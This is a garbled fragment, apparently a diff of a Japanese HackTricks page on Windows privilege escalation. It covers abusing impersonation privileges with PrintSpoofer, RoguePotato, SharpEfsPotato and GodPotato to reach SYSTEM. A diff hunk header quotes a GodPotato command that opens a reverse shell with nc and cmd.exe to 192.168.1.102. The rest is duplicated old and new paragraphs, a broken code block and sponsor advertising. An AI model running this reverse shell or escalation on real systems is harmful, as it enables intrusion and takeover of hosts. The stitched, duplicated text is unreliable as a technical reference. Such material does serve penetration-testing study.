**JuicyPotatoは**Windows Server 2019およびWindows 10ビルド1809以降では**動作しません**。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、**[**GodPotato**](https://github.com/BeichenDream/GodPotato)は、**同じ権限を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを獲得するために使用できます。この[ブログ投稿](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)では、JuicyPotatoが動作しなくなったWindows 10およびServer 2019ホストで権限昇格特権を悪用するために使用できる`PrintSpoofer`ツールについて詳しく説明しています。
**JuicyPotato**Windows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、**[**GodPotato**](https://github.com/BeichenDream/GodPotato)を使用して、同じ特権を利用して`NT AUTHORITY\SYSTEM`レベルのアクセスを取得できます。この[ブログ投稿](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)では、`PrintSpoofer`ツールについて詳しく説明しており、JuicyPotatoが動作しなくなったWindows 10およびServer 2019ホストでインパーソネーション特権を悪用するために使用できます。
{% endhint %}
## クイックデモ
## Quick Demo
### PrintSpoofer
```bash
@ -78,16 +92,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからAWSハッキングをマスターしましょう</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、**ハッキングトリックを共有**します。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>